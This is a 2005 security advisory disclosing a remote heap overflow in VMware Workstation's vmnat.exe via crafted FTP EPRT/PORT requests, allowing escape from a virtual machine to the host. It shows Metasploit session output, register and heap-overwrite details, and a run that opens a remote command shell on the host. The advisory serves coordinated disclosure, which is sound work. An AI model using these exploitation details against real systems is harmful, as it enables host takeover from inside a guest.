<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 GSX Server Variants And Others</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - Remote Heap Overflow</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-25 - 0x1</FONT>
</P>
<P><FONT SIZE=2>Class: Remote Heap Overflow</FONT>
<BR><FONT SIZE=2>Package: VMWare Workstation 5.5.0 <= build-18007</FONT>
<BR> <FONT SIZE=2> VMWare GSX Server Variants</FONT>
<BR> <FONT SIZE=2> VMWare Ace Variants</FONT>
<BR><FONT SIZE=2> VMWare Player Variants</FONT>
<BR><FONT SIZE=2>Exempt: VMWare ESX Server Variants</FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 21, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: High</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton <security-advisories@acs-inc.com></FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>"VMware Workstation is powerful desktop virtualization software for software developers/testers and enterprise IT professionals that runs multiple operating systems simultaneously on a single PC. Users can run Windows, Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines - no rebooting or hard drive partitioning required. VMware Workstation delivers excellent performance and advanced features such as memory optimization and the ability to manage multi-tier configurations and multiple snapshots.</FONT></P>
<P><FONT SIZE=2>With millions of customers and dozens of major product awards over the last six years, VMware Workstation is a proven technology that improves productivity and flexibility. An indispensable tool for software developers and IT professionals worldwide."</FONT></P>
<P> <FONT SIZE=2>-- <A HREF="http://www.vmware.com/products/ws/" TARGET="_blank">http://www.vmware.com/products/ws/</A></FONT>
</P>
<BR>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>A vulnerability was identified in VMware Workstation (And others) vmnat.exe, which could be exploited by remote attackers to execute arbitrary commands. This vulnerability allows the escape from a VMware Virtual Machine into userland space and compromising the host. </FONT></P>
<P><FONT SIZE=2>'Vmnat' is unable to process specially crafted 'EPRT' and 'PORT' FTP Requests. </FONT>
</P>
<BR>
<BR>
<P><FONT SIZE=2>-=[ Proof of Concept:</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>msf > use vmware_vmnat</FONT>
<BR><FONT SIZE=2>msf vmware_vmnat(win32_bind) > exploit</FONT>
<BR><FONT SIZE=2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=2>[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security@acs-inc.com></FONT>
<BR><FONT SIZE=2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=2>[*] No response from FTP server</FONT>
<BR><FONT SIZE=2>[*] Exiting Bind Handler.</FONT>
<BR><FONT SIZE=2>vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable Registers</FONT>
</P>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Breakdown </FONT>
</P>
<P><FONT SIZE=2>Control over registers ECX, EDI, EBX will allow you overwrite an available </FONT>
<BR><FONT SIZE=2>Heap Header PLINK and FLINK. </FONT>
</P>
<P><FONT SIZE=2>EDX points to your buffer on overwrite.</FONT>
</P>
<P><FONT SIZE=2>Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 build 2600</FONT>
</P>
<P><FONT SIZE=2>-=[ Functioning Overflow of Concept:</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>msf > use vmware_vmnat_0day</FONT>
<BR><FONT SIZE=2>msf vmware_vmnat_0day(win32_bind) > exploit</FONT>
<BR><FONT SIZE=2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=2>[*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton <security@acs-inc.com></FONT>
<BR><FONT SIZE=2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=2>[*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444</FONT>
</P>
<P><FONT SIZE=2>Microsoft Windows XP [Version 5.1.2600]</FONT>
<BR><FONT SIZE=2>(C) Copyright 1985-2001 Microsoft Corp.</FONT>
</P>
<P><FONT SIZE=2>C:\Program Files\VMware Workstation></FONT>
</P>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerability originally reported and exploited by Tim Shelton</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-25 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-20 : Vendor released patch, disclosing full information.</FONT>
</P>
</BODY>
</HTML>